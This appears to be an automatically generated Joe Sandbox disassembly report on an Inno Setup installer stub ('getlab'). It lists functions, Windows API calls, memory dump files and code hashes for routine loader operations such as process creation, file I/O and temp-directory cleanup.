                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                          • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                          • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                          • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModulePolicyProcess
                                                                          • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                          • API String ID: 3256987805-3653653586
                                                                          • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                          • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                          • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                          • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E
                                                                          Function 0040A0E7 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 111COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • SetLastError.KERNEL32 ref: 0040A0F4
                                                                            • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,0225233C), ref: 0040966C
                                                                          • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                          • SetWindowLongA.USER32(0001043E,000000FC,00409918), ref: 0040A148
                                                                          • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                          • 73A25CF0.USER32(0001043E,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                                          • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                          • API String ID: 3341979996-3001827809
                                                                          • Opcode ID: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                          • Instruction ID: a1ec2b29f79e5ff862fc4fad7e4f310b8339f10a1453332cc6b7faa73b6a426b
                                                                          • Opcode Fuzzy Hash: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                          • Instruction Fuzzy Hash: C2411F71600205DFD710EBA9EE8AB9977A4EB45304F10467EF514B73E2CBB8A811CB9D
                                                                          Function 004090A4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                          • API String ID: 1646373207-2130885113
                                                                          • Opcode ID: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                          • Instruction ID: 4a4222b704d734fa8d0781b40c04fe9f9c76e7b4f133337d95099c0c8a01123f
                                                                          • Opcode Fuzzy Hash: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                          • Instruction Fuzzy Hash: 20017170748342AEFB00BB72DD4AB163A68E785704F50457BF5407A2D3DABD4C04DA6D
                                                                          Function 0040A0D5 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                          • SetWindowLongA.USER32(0001043E,000000FC,00409918), ref: 0040A148
                                                                            • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                            • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0225233C,00409A90,00000000,00409A77), ref: 00409A14
                                                                            • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0225233C,00409A90,00000000), ref: 00409A28
                                                                            • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                            • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                            • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0225233C,00409A90), ref: 00409A5C
                                                                          • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                          • 73A25CF0.USER32(0001043E,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                          • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                          • API String ID: 978128352-3001827809
                                                                          • Opcode ID: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                          • Instruction ID: f39d198f6ca78f9e57da3cbf677d536b45cc778db879de651171db1d1b5627bc
                                                                          • Opcode Fuzzy Hash: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                          • Instruction Fuzzy Hash: 07411A71604204DFD714EBA9EE86B5A77A4EB49304F10427EE514B73E1CBB8A810CB9D
                                                                          Function 004099A4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77processCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0225233C,00409A90,00000000,00409A77), ref: 00409A14
                                                                          • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0225233C,00409A90,00000000), ref: 00409A28
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                          • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                          • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0225233C,00409A90), ref: 00409A5C
                                                                            • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,0225233C), ref: 0040966C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                          • String ID: D
                                                                          • API String ID: 3356880605-2746444292
                                                                          • Opcode ID: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                          • Instruction ID: 6ea97129cf5aa135a7f7046e3a99eae43c862e8aca722617c6144c18eae127a8
                                                                          • Opcode Fuzzy Hash: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                          • Instruction Fuzzy Hash: 3A1142B17442486EDB10EBE68C42FAEB7ACEF49714F50017BB604F72C2DA785D048A69
                                                                          Function 00409E47 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117windowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Message
                                                                          • String ID: .tmp$y@
                                                                          • API String ID: 2030045667-2396523267
                                                                          • Opcode ID: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                          • Instruction ID: eba11cc0b212557bcf85e4c41764595d0d3f2f842990b0293eb01d0c1562b25b
                                                                          • Opcode Fuzzy Hash: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                          • Instruction Fuzzy Hash: 9841BD30600200DFC711EF25DE96A5A77A5EB49304B50463AF804B73E2CBB9AC05CBED
                                                                          Function 00409E62 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113windowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Message
                                                                          • String ID: .tmp$y@
                                                                          • API String ID: 2030045667-2396523267
                                                                          • Opcode ID: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                          • Instruction ID: fef9de22095f7e51d457e3baefdda2d393bbfb66a144e2f6f14d312cbfdc2d61
                                                                          • Opcode Fuzzy Hash: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                          • Instruction Fuzzy Hash: 3A418D70610204DFC711EF25DED6A5A77A5EB49308B50463AF804B73E2CBB9AC05CBAD
                                                                          Function 00409330 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                          • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID: .tmp
                                                                          • API String ID: 1375471231-2986845003
                                                                          • Opcode ID: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                          • Instruction ID: a1094b0e4056d8a2da25745c6e48f9a4b2523a9a3c4edc503687ab74cbc79d39
                                                                          • Opcode Fuzzy Hash: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                          • Instruction Fuzzy Hash: 3A213674A002099BDB05FFA1C9429DEB7B9EF48304F50457BE901B73C2DA7C9E059AA5
                                                                          Function 00407749 Relevance: 3.3, APIs: 2, Instructions: 284fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 321 407749-40774a 322 4076dc-4076e6 WriteFile 321->322 323 40774c-40776f 321->323 324 4076e8-4076ea call 40748c 322->324 325 4076ef-4076f2 322->325 326 407770-407785 323->326 324->325 328 407700-407704 325->328 329 4076f4-4076fb call 4073ec 325->329 330 407787 326->330 331 4077f9 326->331 329->328 333 40778a-40778f 330->333 334 4077fd-407802 330->334 335 40783b-40783d 331->335 336 4077fb 331->336 338 407803-407819 333->338 340 407791-407792 333->340 334->338 339 407841-407843 335->339 336->334 341 40785b-40785c 338->341 349 40781b 338->349 339->341 342 407724-407741 340->342 343 407794-4077b4 340->343 345 4078d6-4078eb call 407890 InterlockedExchange 341->345 346 40785e-40788c 341->346 348 4077b5 342->348 350 407743 342->350 343->348 366 407912-407917 345->366 367 4078ed-407910 345->367 359 407820-407823 346->359 360 407890-407893 346->360 353 4077b6-4077b7 348->353 354 4077f7-4077f8 348->354 355 40781e-40781f 349->355 356 407746-407747 350->356 357 4077b9 350->357 353->357 354->331 355->359 356->321 361 4077bb-4077cd 356->361 357->361 363 407898 359->363 364 407824 359->364 360->363 361->339 365 4077cf-4077d4 361->365 368 40789a 363->368 364->368 369 407825 364->369 365->335 374 4077d6-4077de 365->374 367->366 367->367 371 40789f 368->371 372 407896-407897 369->372 373 407826-40782d 369->373 375 4078a1 371->375 372->363 373->375 376 40782f 373->376 374->326 384 4077e0 374->384 378 4078a3 375->378 379 4078ac 375->379 380 407832-407833 376->380 381 4078a5-4078aa 376->381 378->381 383 4078ae-4078af 379->383 380->335 380->355 381->383 383->371 385 4078b1-4078bd 383->385 384->354 385->363 386 4078bf-4078c0 385->386
                                                                          APIs
                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                          • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                                          • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                          • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B
                                                                          Function 00406FA0 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 387 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLibraryLoadMode
                                                                          • String ID:
                                                                          • API String ID: 2987862817-0
                                                                          • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                          • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                          • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                          • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                          Function 0040766C Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 397 40766c-407691 SetFilePointer 398 4076a3-4076a8 397->398 399 407693-40769a GetLastError 397->399 399->398 400 40769c-40769e call 40748c 399->400 400->398
                                                                          APIs
                                                                          • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                          • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022503AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$FilePointer
                                                                          • String ID:
                                                                          • API String ID: 1156039329-0
                                                                          • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                          • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                          • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                          • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776
                                                                          Function 0040762C Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 391 40762c-40764a ReadFile 392 407663-40766a 391->392 393 40764c-407650 391->393 394 407652-40765a GetLastError 393->394 395 40765c-40765e call 40748c 393->395 394->392 394->395 395->392
                                                                          APIs
                                                                          • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                          • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastRead
                                                                          • String ID:
                                                                          • API String ID: 1948546556-0
                                                                          • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                          • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                          • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                          • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                          Function 004075C4 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 402 4075c4-4075e5 SetFilePointer 403 4075f7-4075f9 402->403 404 4075e7-4075ee GetLastError 402->404 404->403 405 4075f0-4075f2 call 40748c 404->405 405->403
                                                                          APIs
                                                                          • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                          • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022503AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$FilePointer
                                                                          • String ID:
                                                                          • API String ID: 1156039329-0
                                                                          • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                          • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                          • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                          • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                          Function 00401430 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 2087232378-0
                                                                          • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                          • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                          • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                          • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                          Function 00405270 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                            • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                            • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultInfoLoadLocaleStringSystem
                                                                          • String ID:
                                                                          • API String ID: 1658689577-0
